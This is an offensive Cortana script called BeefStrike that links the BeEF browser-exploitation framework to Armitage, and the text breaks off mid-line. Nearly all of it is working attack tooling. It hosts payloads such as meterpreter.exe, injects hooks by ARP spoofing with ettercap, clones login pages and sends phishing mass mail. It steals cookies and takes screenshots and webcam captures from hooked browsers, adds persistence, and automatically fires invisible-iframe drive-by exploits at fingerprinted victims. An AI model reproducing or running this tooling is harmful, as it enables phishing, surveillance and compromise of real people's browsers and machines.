############################ WARNING !!!################################################## ## ## ## Before beginning to use this script, change all the ## ## "import" lines ... Obviously you must put the right path for each Library. ## ## But keep the lib folder (and his content) in the same folder than "BeefLib.jar" ## ## ## ## BeefStrike is a script for Beef and Armitage integration. May be you must read the ## ## README file and watch Youtube video demo before use it ## ## ## ## ## ## > by Beny Green < ## ## [ aka @TheBenyGreen ] ## ## ## ########################################################################################## import com.eyesopencrew.* from: C:\BeefLib\dist\BeefLib.jar; import org.apache.commons.* from: C:\BeefLib\dist\lib\commons-lang-2.5.jar; import org.apache.commons.* from: C:\BeefLib\dist\lib\commons-logging-1.1.3.jar; import org.apache.commons.* from: C:\BeefLib\dist\lib\commons-beanutils-1.8.3.jar; import org.apache.commons.* from: C:\BeefLib\dist\lib\commons-collections-3.2.1.jar; import net.sf.json.* from: C:\BeefLib\dist\lib\json-lib.jar; import net.sf.ezmorph.* from: C:\BeefLib\dist\lib\ezmorph-1.0.6.jar; ################### CORE variables ############################################### #global('@beef_hosts @beef_hostsoff @beef_cmde @beef_result $key $beefUrl $user $pass'); @beef_hosts = @(%()); # array of beef online zombies @beef_hostsoff = @(%()); # array of beef offline zombies @beef_cmde = @(%()); # array of beef commandes - list @beef_result = @(%()); # array of beef command result - list [NOT USE YET] $key = "00000000000000000000000" ; # the MUCH important RESTful API key $beefhook = ""; # Beef hook link $zombieNumMonitor = 0 ; # monitor the variation of the zombies number $size_on = 0; $size_off = 0; # SNIPER variables @browser_profile_list = @(%()); @autorundisabled = @(); $assault_mode = 1; $targets_id = 0 ; $id_analyz = 0; $id_beef_autorun = 0 ; $beefpath = "/usr/share/beef-xss" ; ######################## Introduction ########################################### on ready { $console = console(); $console = open_console_tab ("Beef Strike","all","zmb_hook",1); cmd($console , " \c8 Using beefmetasploitplugin is no longer a need for BeefStrike. But we always take care for some users usage."); cmd($console , "load beef"); say("Beef_Strike is running"); } on console_beef_connect { } ######################### BeEF MENU BAR #################################### popup attacks { menu "BeEF Strike"{ menu "Start" { item "Connect" { cmd($console , "beef_disconnect"); $beefUrl = prompt_text("BeEF Server (with http://). Don't use loopback",""); $user = prompt_text("User","beef"); $pass = prompt_text("Password","beef"); $connect = "curl -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '{\"username\":\"$user\", \"password\":\"$pass\"}' " . $beefUrl . "/api/admin/login"; cmd($console , "$connect"); cmd($console , "beef_connect $beefUrl $user $pass");sleep(30); $beefhook = "" . $beefUrl. "/hook.js" ; append($console, "\c9[+] BeEF Hook URL : " . $beefhook . ""); show_message(" [+] Copy and add your RESTful_API_Key (Token)"); } item " Key" { $key = prompt_text("Copy and Paste RESTful_API_Key here","$key"); if ($key ne "00000000000000000000000" ){ fill(); sleep(1000); show_message("Well done, now wait for new zombie."); }else{show_message("Your key cannot be the default 0000000000000000 ");} println("Here is the REST_ful API Key: $key "); } menu "Control BeEF service" { item "BeEF PATH" { $beefpath = prompt_text("Enter path to BeEF main folder","$beefpath"); append($console, "\c9[*] BeEF FOLDER PATH : " . $beefpath . ""); } item "START" { cmd_async("service beef-xss start"); } item "STOP" { cmd_async("service beef-xss stop"); } item "CONFIG" { cmd_async("xterm -e 'vim " . $beefpath . "/config.yaml '"); cmd_async("xterm -e 'vim " . $beefpath . "/extensions/social_engineering/config.yaml '"); cmd_async("xterm -e 'vim " . $beefpath . "/extensions/social_engineering/config.yaml '"); } item "CUSTOMHOOK" { cmd_async("xterm -e 'vim " . $beefpath . "/extensions/customhook/config.yaml'"); append($console, "\cC[*] Another windows have been open in your Teamserver machine \n Configure and enable CUSTOM HOOK EXTENSION"); append($console, "\cC[*]\cC Help : http://blog.beefproject.com/2013/01/beef-qr-fun.html -- by @xntrik"); append($console, "\cC[*] URL SHORTNER SERVICE LIST :\n > ow.ly \n > bit.ly \n > goo.gl \n > t.co \n See long list : http://longurl.org/services"); } item "MOUNT FILE" { if ($key ne "00000000000000000000000" ){ $file2host = prompt_text("The name of the file to host","meterpreter.exe"); $file2path = prompt_text("Full path of the file to host","/root"); cmd_async("cp " . $file2path . " " . $beefpath . "/extensions/social_engineering/droppers"); $file2hosturipath = prompt_text("URIPATH of the file to host","/file.exe"); $link = "" . $beefUrl . "/api/server/bind?token=$key" ; $mount = "curl -H \"Content-Type: application/json; charset=UTF-8\" -d '{\"mount\":\"" . $file2hosturipath . "\",\"local_file\": \"/extensions/social_engineering/droppers/" . $file2host . "\"} ' -X POST " . $link . "" ; cmd($console , "$mount"); } else {show_message("You need to setup REST_ful API Key before use it (o_O) ! ");} } } } menu "Recruitment" { #use ettercap filter for html injection - low injection success rate. item "Ettercap method" { $eth0 = prompt_text("Network interface of the LAN to infect","eth0"); $filter = prompt_text("Put the absolute path of your filter","/opt/metasploit/msf3/data/armitage/cortana-scripts/beef_strike/infect.filter"); cmd_async(" xterm -e 'etterfilter $filter -o html.ef'"); cmd_async(" xterm -e 'ettercap -T -q -i $eth0 -F html.ef -M ARP // //'"); cmd($console , "\c9[+] ettercap filter > Contamination beging ..."); show_message("ettercap filter > Contamination beging ..."); } item "Web Cloner"{ append($console, "[o] Help : http://blog.beefproject.com/2012/09/beef-web-cloning-beef-mass-mailing.html -- by @antisnatchor"); $site2clone = prompt_text("URL to Clone : ","http://gmail.com"); $uripath = prompt_text("URIPATH : ","/login.aspx"); $beefcloned = "" . $beefUrl . ""; $link = "" . $beefUrl . "/api/seng/clone_page?token=$key"; $webcloning = "curl -H \"Content-Type: application/json; charset=UTF-8\" -d '{\"uri\":\"" . $site2clone . "\", \"mount\":\"" . $uripath . "\"}' -X POST " . $link . ""; cmd($console , "$webcloning"); } item "Mass Mailer"{ append($console, "[o] Help : http://blog.beefproject.com/2012/09/beef-web-cloning-beef-mass-mailing.html -- by @antisnatchor"); $mailtemplate = prompt_text("Mail template: ","default"); $mailsubject = prompt_text("Mail Subject : ","New Privacy policy"); $fromname = prompt_text("From : ","BeEF team"); $beeftraplink = prompt_text("URL of trap page : ","$beefcloned"); $beefspooftraplink = prompt_text("Link's Text of the trap page : ","$site2clone"); $recipients = prompt_text("RECIPIENTS :","\"antisnatchor@example.com\":\"Michelle\",\"rsmudge@example.com\":\"Raphael\""); $link = "" . $beefUrl . "/api/seng/send_mails?token=$key" ; $sendmail = "curl -H \"Content-Type: application/json; charset=UTF-8\" -d '{\"template\":\"" . $mailtemplate . "\",\"subject\":\"" . $mailsubject . "\",\"fromname\": \"" . $fromname . "\",\"link\": \"" . $beeftraplink . "\",\"linktext\": \"" . $beefspooftraplink . "\",\"recipients\": [{" . $recipients . "}]} ' -X POST " . $link . "" ; cmd($console , "$sendmail"); } item "Other method"{ show_message("[Recruitment method idea] \n XSS scanning : find permanent xss vulns and inject beef hooks.\n Better LAN injection: Googling for Shank.rb, LANs.py \nDemos: youtube.com/thebenygreen"); } } item "Horde of zombies" { local('$zombitableoff'); $zombitableoff = open_table_tab("zombies-OFF", "", @("id", "ip","name","version","OS","platform", "domain", "port", "URI", "sessionID"), @(), @("RefreshOFF"), "zmb_hookoff", 1); refresh_hostsoff($zombitableoff); # two tab is open for Online and offline zombies. local('$zombitable'); $zombitable = open_table_tab("zombies", "", @("id", "ip","name","version","OS","platform", "domain", "port", "URI", "sessionID"), @(), @("Refresh", "More details"), "zmb_hook", 1); refresh_hosts($zombitable); } # menu "Commands Results " { # item "See Results tracking Table" { # local('$resultable'); # $resultable = open_table_tab("Results", "", @("name", "ip", "sessionID", "commandID", "resultID"), @(), @("Refresh results"), "result_hook", 1); # refresh_result($resultable); # } # item "Set the current command_id tracking value" { # $id_result = prompt_text("Put the last command_id value from the console.",""); # $id_result = $id_result + 1 ; # } # } item "BeEF Console" { $console = open_console_tab ("Beef Strike","all","zmb_hook",1); cmd($console , "load beef"); cmd($console , "beef_connect $beefUrl $user $pass"); } item "Web UI panel" { $beefUrlpanel = "/ui/panel"; url_open("$beefUrl $+ $beefUrlpanel"); } } } popup hosts_top { menu "IP Geolocation" { item "Satellite" { $iploc = prompt_text("IP to localize ",""); $freegeoip_url = "http://freegeoip.net/json/" . $iploc . ""; $maptype = "satellite"; $json_freegeoip = [BeefRequester BeefGetRequest: "$freegeoip_url"]; geomap($json_freegeoip, $maptype); } item "Roadmap" { $iploc = prompt_text("IP to localize ",""); $freegeoip_url = "http://freegeoip.net/json/" . $iploc . ""; $maptype = "roadmap"; $json_freegeoip = [BeefRequester BeefGetRequest: "$freegeoip_url"]; geomap($json_freegeoip, $maptype); } item "Geobytes web page" { $geobyte_url = "http://www.geobytes.com/IpLocator.htm?GetLocation&IpAddress=" ; url_open("$geobyte_url $+ $1"); } } } on host_add {cmd($console , "\n \c9 [+] New zombie with IP: $1");} # The heart beat of BeefStrike, specify the frequency of each update : zombie online and offline list, zombie importation on heartbeat_5s { zombiupdate(); } ################### Menu of action to interact with each zombie ################# popup zmb_hook { @idr = flatten(table_selected($1, "id")); @adr = flatten(table_selected($1, "address")); @sessidr = flatten(table_selected($1, "sessionID")); $idr = @idr[0]; $adr = @adr[0]; $sessidr = @sessidr[0]; item "Informations" { zombi_info($idr); } menu "Recon." { item "Port scan" { $cmde_param = prompt_text("Ports to scan (example:)","\"ipHost\":\"\",\"ports\":\"default\",\"closetimeout\":\"1100\",\"opentimeout\"=\"2500\",\"delay\"=\"600\",\"debug\"=\"false\""); send_beefcmd_with_param($sessidr, $code_portscan, $cmde_param, 0, $adr); } item "Ping Sweep" { $cmde_param = prompt_text("IP to Ping ","\"ipRange\":\"\",\"timeout\":\"2000\",\"delay\":\"100\""); send_beefcmd_with_param($sessidr, $code_pingjav, "", 0, $adr); } item "DNS Enumeration" { $cmde_param = prompt_text("DNS enumeration ","\"dns_list\":\"%default%\",\"timeout\":\"4000\""); send_beefcmd_with_param($sessidr, $code_dnsenum, "", 0, $adr); } item "Fingerprint Network" { $cmde_param = prompt_text("Internal network fingerprinting ","\"ipRange\":\"\",\"ports\":\"80,8080,445\""); send_beefcmd_with_param($sessidr, $code_fingnetwork, "", 0, $adr); } } menu "Attack" { item "Drive-by" { local ('$inviframe'); $inviframe = prompt_text("URL (with http://)","http://"); append($console, "\c4[*] Come here baby !"); append($console , "Send invisible iframe : " . $inviframe . " --> " . $sessidr . "" ); run_driveby($beefUrl, $sessidr, $key, $inviframe); } item "Raw JS" { $cmde_param = prompt_text("JS code (here is the example to follow)","\"cmd\":\"alert(WTF);\""); send_beefcmd_with_param($sessidr, $code_rawjs, $cmde_param, 0, $adr); } } menu "Special" { item "Get_cookie" { send_beef_cmd_without_param($sessidr, $code_getcookie, $adr); } item "Screenshot" { send_beefcmd_with_param($sessidr, $code_screenshot,"", 0, $adr); } item "Webcam" { send_beefcmd_with_param($sessidr, $code_webcam,"", 1, $adr); # The picture is sent as a base64 encoded JPG string # Copy the base64 text into a file called picture.txt (it’ll start with /9y/ and end in ==). # Then you can decode it in the command line with the following: # $ base64 -d -i picture.txt > picture.jpg } menu "Geolocation" { #110 item "Satellite" { send_beef_cmd_without_param($sessidr, $code_geoloc, $adr); $freegeoip_url = "http://freegeoip.net/json/" . $adr . ""; $maptype = "satellite"; $json_freegeoip = [BeefRequester BeefGetRequest: "$freegeoip_url"]; geomap($json_freegeoip, $maptype); } item "Roadmap" { send_beef_cmd_without_param($sessidr, $code_geoloc, $adr); $freegeoip_url = "http://freegeoip.net/json/" . $adr . ""; $maptype = "roadmap"; $json_freegeoip = [BeefRequester BeefGetRequest: "$freegeoip_url"]; geomap($json_freegeoip, $maptype); } } item "Send command " { local ('$idcmde'); append($console , "Send Command ID to >>>" . $adr . "" ); $idcmde = prompt_text("Command ID","27"); send_beefcmd_with_param($sessidr, $idcmde, "", 1, $adr); } } menu "Social Eng." { item "Clickjacking" { send_beefcmd_with_param($sessidr, $code_clickjak,"", 1, $adr); } item "TabNabbing" { send_beefcmd_with_param($sessidr, $code_tabnabbing,"", 1, $adr); } item "Fake flash update" { send_beefcmd_with_param($sessidr, $code_fakeflash,"", 1, $adr); } item "Pretty thief" { send_beefcmd_with_param($sessidr, $code_theft,"", 1, $adr); } item "Clippy" { send_beefcmd_with_param($sessidr, $code_clippy,"", 1, $adr); } } menu "Persistence" { item "MiTB" { send_beefcmd_with_param($sessidr, $code_persist_mitb,"", 1, $adr); } item "Foreground iFrame" { send_beefcmd_with_param($sessidr, $code_persist_iframe,"", 1, $adr); } item "Confirm close tab" { send_beefcmd_with_param($sessidr, $code_persist_closetab,"", 1, $adr); } } item "Unhook" { append($console , "Unhook : " . $idr . " -> Pushed out off the horde" ); send_beef_cmd_without_param($sessidr, $code_unhook, $adr); } } popup result_hook { @cmdid = flatten(table_selected($1, "commandID")); @rsltid = flatten(table_selected($1, "resultID")); @sessid = flatten(table_selected($1, "sessionID")); @cmdnam = flatten(table_selected($1, "name")); $cmdid = @cmdid[0]; $rsltid = @rsltid [0]; $sessid = @sessid[0]; $cmdnam = @cmdnam[0]; $link = "$beefUrl $+ /api/modules/ $+ $sessid $+ / $+ $cmdid $+ / $+ $rsltid $+ ?token= $+ $key"; item "Take a look" { append($console ,"\c8 [ $cmdnam ]"); $send_url = "curl -H \"Content-Type: application/json; charset=UTF-8\" " . $link . "" ; cmd($console , "$send_url");sleep(20); } } # This function send beEF command without param ! sub send_beef_cmd_without_param { result_tracker($1, $2, $3); $link = "" . $beefUrl . "/api/modules/" . $1 . "/" . $2 . "?token=$key"; $send_url = "curl -H \"Content-Type: application/json; charset=UTF-8\" -d '{}' -X POST " . $link . ""; # " > beefcmdresult.json"; cmd($console , "$send_url");sleep(20); } # Send beef command with params using sesion ID and RESTfull_API key sub send_beefcmd_with_param { if ($4 == 1) { $cmde_param = prompt_text("Configure option(s) or leave empty for default values.","\"param1\":\"value1\",\"param2\":\"value2\""); } else { $cmde_param = $3; } $link2 = "" . $beefUrl . "/api/modules/" . $1 . "/" . $2 . "?token=$key"; # $4 is the param $attak2 = "curl -H \"Content-Type: application/json; charset=UTF-8\" -d '{" . $cmde_param . "}' -X POST " . $link2 . ""; #" > beefcmdresult.json"; cmd($console , "$attak2"); sleep(20); #$handlef = openf("/root/beefcmdresult.json"); #while $readf (readln($handlef)){ # $jsrs = [new JSONObject]; # $jsrs = [JSONSerializer toJSON: "$readf"]; # $id_result = [[$js get: "command_id"] toString]; # println($id_result); # result_tracker($1, $2, $5); #} } sub result_tracker { for ($i = 0; $i < size(@beef_cmde); $i++) { if (@beef_cmde[$i]["id"] eq $2 ) { $cmdename = @beef_cmde[$i]["name"] ; break;} } %rslt = %(name => "$cmdename", ip => "$3", sessionID => "$1", commandID => "$2", resultID => "$id_result"); @beef_result[$id_result] = %rslt; } sub refresh_hosts { table_set($1, @beef_hosts); } sub refresh_hostsoff { table_set($1, @beef_hostsoff); } sub refresh_result { table_set($1, @beef_result); } on tab_table_click { if ($3 eq "Refresh") { refresh_hosts($1); } if ($3 eq "RefreshOFF") { refresh_hostsoff($1); } if ($3 eq "Fill it") { fill_cmde_tab($1); } if ($3 eq "Refresh results") { refresh_result($1); } if ($3 eq "See autorun list") { local('$beef_autorun'); $beef_autorun = open_table_tab("BeEF autorun", "", @("cc", "id", "name", "category", "browser", "Param"), @(), @("Refresh list","Delete entry","Edit Param", "Load Clent-side Recon cmds", "Replay", "Clear All"), "autorun_hook", 1); refresh_list($beef_autorun); } if ($3 eq "More details") { local('$beef_details'); $beef_details = open_table_tab("Zombies details", "", @("id", "sessionID", "Browser", "UserAgent", "Type","Version", "OS", "Platform", "ActiveX", "Flash", "Java", "VBScript", "Plugins", "GoogleGears", "WebSocket", "HostName"), @(), @("Refresh details"), "zmb_hook", 1); refresh_details($beef_details); } if ($3 eq "Edit Param") { editparam($1); } if ($3 eq "Refresh profiles") { refresh_profiles($1); } if ($3 eq "Edit") { edit_profiles($1); } if ($3 eq "Set cc link") { edit_cclink($1); } if ($3 eq "Add") { add_profiles($1); } if ($3 eq "Delete") { delete_profiles($1); } if ($3 eq "Refresh match") { rematch(); refresh_analyze($1); } if ($3 eq "Change URL") { changeurl($1); } if ($3 eq "Attack all") { # This action tell sniper to shot all targets which appear on the line of sigh. # No, this is not a FPS game. if (size(@analyze) != 0) { for ($i = 0; $i < size(@analyze); $i++) { $sid = @analyze[$i]["sessionID"] ; $inviframe = @analyze[$i]["Attack_URL"] ; run_driveby($beefUrl, $sid, $key, $inviframe); append($console , "\c9[*] Sniper send attack " . $inviframe . " >>> " . $sid . "" ); } } else {println("No profiles/zombies association found !")} } if ($3 eq "Refresh list") { refresh_list($1); } if ($3 eq "Delete entry") { delete_entry($1); } if ($3 eq "Load Clent-side Recon cmds") { load_clientside_recon_mod(); refresh_list($1); } if ($3 eq "Refresh details") { refresh_details($1); } if ($3 eq "Replay") { show_message("Autorun keep track of zombies already parsed. \n This action clear that track so that autorun can be replay"); clear(@autorundisabled); println(size(@autorundisabled)); } if ($3 eq "Clear All") { $id_beef_autorun = 0 ; clear(@beef_autorun); refresh_list($1); } if ($3 eq "Line of sight") { local('$attackMap'); $attackMap = open_table_tab("Line of Sight", "", @("id", "ip", "sessionID", "Attack_URL"), @(), @("Refresh match", "Change URL", " Attack all"), "analyze_hook", 1); refresh_analyze($attackMap); } } # So what append when we have a new zombie ? on zombies_news { for ($i = $1; $i < $2; $i++) { add_profile($i); } } sub add_profile { #local('$go'); host_add(@beef_hosts[$1]["ip"]); $sid = @beef_hosts[$1]["sessionID"]; $sip = @beef_hosts[$1]["ip"]; $browser = @beef_hosts[$1]["name"]; append($console, "\c9 [+] Send MiTB module for Persistence."); send_beefcmd_with_param($sid, $code_mitb, "", 0,"--"); # MITB Persistence # host_os(@beef_hosts[$1]["ip"],@beef_hosts[$1]["OS"]); ##### DRONE SECTION : Analyse target's profile and send a very specific URL to this target # STEP 1 - extracted informations about a particular zombie. if ( size(@beef_hosts) != 0 ) { $link = "" . $beefUrl . "/api/hooks/" . $sid . "?token=" . $key . ""; $details = [BeefRequester BeefGetRequest: "$link"];#sleep(100); $js = [new JSONObject]; $js = [JSONSerializer toJSON: "$details"]; $This_BrowserName = [[$js get: "BrowserName"] toString];#used by sniper $This_BrowserPlugins = [[$js get: "BrowserPlugins"] toString]; $This_BrowserReportedName = [[$js get: "BrowserReportedName"] toString]; $This_BrowserType = [[$js get: "BrowserType"] toString]; $This_BrowserVersion = [[$js get: "BrowserVersion"] toString]; $This_HasActiveX = [[$js get: "HasActiveX"] toString]; $This_HasFlash = [[$js get: "HasFlash"] toString]; $This_HasGoogleGears = [[$js get: "HasGoogleGears"] toString]; $This_HasWebSocket = [[$js get: "HasWebSocket"] toString]; $This_HostName = [[$js get: "HostName"] toString]; $This_JavaEnabled = [[$js get: "JavaEnabled"] toString]; $This_OsName = [[$js get: "OsName"] toString]; $This_SystemPlatform = [[$js get: "SystemPlatform"] toString]; $This_VBScriptEnabled = [[$js get: "VBScriptEnabled"] toString]; %extracted = %(id => "$1", sessionID => "$sid", Browser => "$This_BrowserName", UserAgent => "$This_BrowserReportedName", Type => "$This_BrowserType", Version => "$This_BrowserVersion", OS => "$This_OsName", Platform => "$This_SystemPlatform", ActiveX => "$This_HasActiveX", Flash => "$This_HasFlash", Java => "$This_JavaEnabled", VBScript => "$This_VBScriptEnabled", Plugins => "$This_BrowserPlugins", GoogleGears => "$This_HasGoogleGears", WebSocket => "$This_HasWebSocket", HostName => "$This_HostName" ); } println("Check profile existence :"); println(%extracted["Browser"]); # STEP 2 - Try to find profiles matching with zombies's informations - if the sum is > than 0 => No match ! Pass foreach $index => $value (@targets){ %profile = $value; $decision = checker("UserAgent", %extracted) + checker("Browser", %extracted) + checker("Version", %extracted) + checker("OS", %extracted) + checker("Plugins", %extracted) + checker("Java", %extracted) + checker("Flash", %extracted) + checker("ActiveX", %extracted) + checker("Platform", %extracted) + checker("VBScript", %extracted) ; # STEP 3 - Zombies association with a client-side exploit well suited if we found one. println("$decision"); if ($decision == 0){ $inviframe = %profile["Attack_URL"]; $cclink = %profile["Link_cc"]; %analyz_dr = %(id => "$id_analyz", ip => "$sip", sessionID => "$sid" , Attack_URL => "$inviframe"); @analyze["$id_analyz"] = %analyz_dr; $id_analyz = $id_analyz + 1 ; append($console , "Sniper has found a target that match with one of your defined profiles " ) if ($cclink ne "-" || $cclink ne " " || $cclink ne "*" || $cclink ne ""){ $targeted_cmdeid = @beef_autorun[$cclink]["id"]; $targeted_cmde_param = @beef_autorun[$cclink]["Param"]; send_beefcmd_with_param($sid, $targeted_cmdeid, $targeted_cmde_param,0,$sip); #sleep(50); append($console , "\c9[*] Sniper send targeted command (+)"); } if ($assault_mode == 1){ if ($inviframe ne "-" || $inviframe ne " " || $inviframe ne "*" || $inviframe ne ""){ run_driveby($beefUrl, $sid, $key, $inviframe); append($console , "\c9[*] Sniper send attack (+)" . $inviframe . " >>> " . $sid . "" ); } else {append($console , "\c9[-] No Attack specified for Sniper" );} } else { append($console , "\cC[*] Sniper wait for assault mode activation ... "); } }else{} } #### AUTORUN SECTION : This action execute each command added to the beef's autorun list once a new zombie appear append($console, "\c8 [*] Check and execute Autorun commands "); $lim = size(@beef_autorun); if ( $size_on != 0 && $lim != 0 ) { foreach $index => $sessvalue (@autorundisabled) { if ( $sid ne $sessvalue){ $go = 0; } else { $go = 1; } } if ( $go == 0) { for ($m = 0; $m <= $lim; $m++) { println("AUTORUN TRACK :"); println(@beef_autorun[$m]["browser"]); if ( $browser eq @beef_autorun[$m]["browser"] || @beef_autorun[$m]["browser"] eq "All" ){ $cmdeid = @beef_autorun[$m]["id"]; $cmde_param = @beef_autorun[$m]["Param"]; send_beefcmd_with_param($sid, $cmdeid, $cmde_param,0,"--"); #sleep(50); } } push(@autorundisabled, $sid ) ; } else { println("autorun blocked");} } else { println("Autorun : Nothing found");} host_add(@beef_hosts[$1]["ip"]); host_os($sip,$This_OsName); } # Build and store browsers's profiles of every new zombie sub update_profile { if ( size(@beef_hosts) != 0 ) { clear(@browser_profile_list); for ($n = 0; $n < size(@beef_hosts); $n++) { $sid = @beef_hosts[$n]["sessionID"]; $link = "" . $beefUrl . "/api/hooks/" . $sid . "?token=" . $key . ""; $details = [BeefRequester BeefGetRequest: "$link"];#sleep(100); $js = [new JSONObject]; $js = [JSONSerializer toJSON: "$details"]; $BrowserName = [[$js get: "BrowserName"] toString];#used by sniper $BrowserPlugins = [[$js get: "BrowserPlugins"] toString]; $BrowserReportedName = [[$js get: "BrowserReportedName"] toString]; println($BrowserReportedName); $BrowserType = [[$js get: "BrowserType"] toString]; $BrowserVersion = [[$js get: "BrowserVersion"] toString]; $HasActiveX = [[$js get: "HasActiveX"] toString]; $HasFlash = [[$js get: "HasFlash"] toString]; $HasGoogleGears = [[$js get: "HasGoogleGears"] toString]; $HasWebSocket = [[$js get: "HasWebSocket"] toString]; $HostName = [[$js get: "HostName"] toString]; $JavaEnabled = [[$js get: "JavaEnabled"] toString]; $OsName = [[$js get: "OsName"] toString]; $SystemPlatform = [[$js get: "SystemPlatform"] toString]; $VBScriptEnabled = [[$js get: "VBScriptEnabled"] toString]; %browser_profile = %(id => "$n", sessionID => "$sid", Browser => "$BrowserName", UserAgent => "$BrowserReportedName", Type => "$BrowserType", Version => "$BrowserVersion", OS => "$OsName", Platform => "$SystemPlatform", ActiveX => "$HasActiveX", Flash => "$HasFlash", Java => "$JavaEnabled", VBScript => "$VBScriptEnabled", Plugins => "$BrowserPlugins", GoogleGears => "$HasGoogleGears", WebSocket => "$HasWebSocket", HostName => "$HostName" ); @browser_profile_list[$n] = %browser_profile; } } } # This action try to keep your zombie list up to date inside Armitage sub zombiupdate { if ($key ne "00000000000000000000000" ){ $hooks_list_link = "" . $beefUrl . "/api/hooks?token=" . $key . ""; $jsonTxt = [BeefRequester BeefGetRequest: "$hooks_list_link"];sleep(100); #JSON Processing ---- ONLINE ZOMBIES -----* * *------------------ clear(@beef_hosts); $on = [OnlineClass extractOnline: $jsonTxt ]; for ($i = 0; $i < [$on size]; $i++) { $id = $i ; $ip = [OnlineClass extractZombieData: $jsonTxt, $i, "ip"]; $name = [OnlineClass extractZombieData: $jsonTxt, $i, "name"]; $version = [OnlineClass extractZombieData: $jsonTxt, $i, "version"]; $os = [OnlineClass extractZombieData: $jsonTxt, $i, "os"]; $platform = [OnlineClass extractZombieData: $jsonTxt, $i, "platform"]; $domain = [OnlineClass extractZombieData: $jsonTxt, $i, "domain"]; $port = [OnlineClass extractZombieData: $jsonTxt, $i, "port"]; $page_uri = [OnlineClass extractZombieData: $jsonTxt, $i, "page_uri"]; $session = [OnlineClass extractZombieData: $jsonTxt, $i, "session"]; %hoston = %(id => $id, ip => "$ip", name => "$name", version => "$version", OS => "$os", platform => "$platform", domain => "$domain", port => "$port", URI => "$page_uri", sessionID => "$session"); @beef_hosts[$i] = %hoston; } #JSON Processing ---- OFFLINE ZOMBIES -----* * *------------------ clear(@beef_hostsoff); $off = [OfflineClass extractOffline: $jsonTxt ]; for ($i = 0; $i < [$off size]; $i++) { $id = $i ; $ip = [OfflineClass extractZombieData: $jsonTxt, $i, "ip"]; $name = [OfflineClass extractZombieData: $jsonTxt, $i, "name"]; $version = [OfflineClass extractZombieData: $jsonTxt, $i, "version"]; $os = [OfflineClass extractZombieData: $jsonTxt, $i, "os"]; $platform = [OfflineClass extractZombieData: $jsonTxt, $i, "platform"]; $domain = [OfflineClass extractZombieData: $jsonTxt, $i, "domain"]; $port = [OfflineClass extractZombieData: $jsonTxt, $i, "port"]; $page_uri = [OfflineClass extractZombieData: $jsonTxt, $i, "page_uri"]; $session = [OfflineClass extractZombieData: $jsonTxt, $i, "session"]; %hostoff = %(id => $id, ip => "$ip", name => "$name", version => "$version", OS => "$os", platform => "$platform", domain => "$domain", port => "$port", URI => "$page_uri", sessionID => "$session"); @beef_hostsoff[$i] = %hostoff; } $size_on = size(@beef_hosts); $size_off = size(@beef_hostsoff); # Fire event when there is a positive variation of zombies's number. if ($zombieNumMonitor < $size_on){ update_profile(); append($console, "\c9 [+] New zombie(s) join the horde"); println("\c9 [+] New zombie(s) join the horde"); say("New zombie(s) join the horde"); $prevnum = $zombieNumMonitor ; $zombieNumMonitor = $size_on ; $newnum = $zombieNumMonitor ; fire_event("zombies_news", $prevnum, $newnum); } if ($zombieNumMonitor > $size_on){ append($console, "\c4 [-] Some zombies have leave the horde"); println("\c4 [-] Some zombies have leave the horde"); say("Some zombies have leave the horde"); $zombieNumMonitor = $size_on ; update_profile(); } } else { append($console, "\c4[!]No Key available");} } #################################### GIVE ME MY SHELL ! ########################### # I love this action, it send invisible iframe to your target so easily that you can play with client-side exploit like you do with remote exploit. :-D awesome ! sub run_driveby { result_tracker($1, $2, "--"); $link = "" . $1 . "/api/modules/" . $2 . "/" . $code_inviframe . "?token=$3"; $attak = "curl -H \"Content-Type: application/json; charset=UTF-8\" -d '{\"target\":\"" . $4 . "\"}' -X POST " . $link . ""; cmd($console , "$attak"); say("Send invisible iFrame: " . $4 . " via Beef_Strike "); } # this action show an info box with details about a particular zombie sub zombi_info { $BrowserName = @browser_profile_list[$1]["Browser"] ; $BrowserPlugins = @browser_profile_list[$1]["Plugins"] ; $BrowserReportedName = @browser_profile_list[$1]["UserAgent"] ; $BrowserType = @browser_profile_list[$1]["Type"] ; $BrowserVersion = @browser_profile_list[$1]["Version"] ; $HasActiveX = @browser_profile_list[$1]["ActiveX"] ; $HasFlash = @browser_profile_list[$1]["Flash"] ; $HasGoogleGears = @browser_profile_list[$1]["GoogleGears"] ; $HasWebSocket = @browser_profile_list[$1]["WebSocket"] ; $HostName = @browser_profile_list[$1]["HostName"] ; $JavaEnabled = @browser_profile_list[$1]["Java"] ; $OsName = @browser_profile_list[$1]["OS"] ; $SystemPlatform = @browser_profile_list[$1]["Platform"] ; $VBScriptEnabled = @browser_profile_list[$1]["VBScript"]; show_message( "BrowserName: " . $BrowserName . "\n +--------------------------------------------------+\n BrowserPlugins: " . $BrowserPlugins . "\n BrowserReportedName: " . $BrowserReportedName . "\nBrowserType: " . $BrowserType . "\n BrowserVersion: " . $BrowserVersion . "\n +--------------------------------------------------+\n HasActiveX: " . $HasActiveX . "\n HasFlash: " . $HasFlash . "\n HasGoogleGears: " . $HasGoogleGears . "\n HasWebSocket: " . $HasWebSocket . "\n HostName: " . $HostName . "\n JavaEnabled: " . $JavaEnabled . "\n OsName: " . $OsName . "\n SystemPlatform: " . $SystemPlatform . "\n VBScriptEnabled: " . $VBScriptEnabled . "\n +--------------------------------------------------+"); append($console ,"\c8 ZOMBIE INFOS \n BrowserName: " . $BrowserName . "\n +--------------------------------------------------+\n BrowserPlugins: " . $BrowserPlugins . "\n BrowserReportedName: " . $BrowserReportedName . "\nBrowserType: " . $BrowserType . "\n BrowserVersion: " . $BrowserVersion . "\n +--------------------------------------------------+\n HasActiveX: " . $HasActiveX . "\n HasFlash: " . $HasFlash . "\n HasGoogleGears: " . $HasGoogleGears . "\n HasWebSocket: " . $HasWebSocket . "\n HostName: " . $HostName . "\n JavaEnabled: " . $JavaEnabled . "\n OsName: " . $OsName . "\n SystemPlatform: " . $SystemPlatform . "\n VBScriptEnabled: " . $VBScriptEnabled . "\n +--------------------------------------------------+"); } ################### JSON Processing ---- BEEF COMMANDS ---- ##################### sub fill_cmde_tab { sleep(100); table_set($1, @beef_cmde); } sub cmde_info { $link2 = "" . $beefUrl . "/api/modules/" . $1 . "?token=" . $key . ""; $cmdeid = [BeefRequester BeefGetRequest: "$link2"]; sleep(100); $jsoncmdeinfo = [new JSONObject]; $jsoncmdeinfo = [JSONSerializer toJSON: "$cmdeid"]; $name = [[$jsoncmdeinfo get: "name"] toString]; $description = [[$jsoncmdeinfo get: "description"] toString]; $options = [[$jsoncmdeinfo get: "options"] toString]; show_message( "Name: " . $name . "\n +---------------------------------------------+\n Description: " . $description . "\n Options: " . $options . "\n +-------------------------------------------+"); append($console 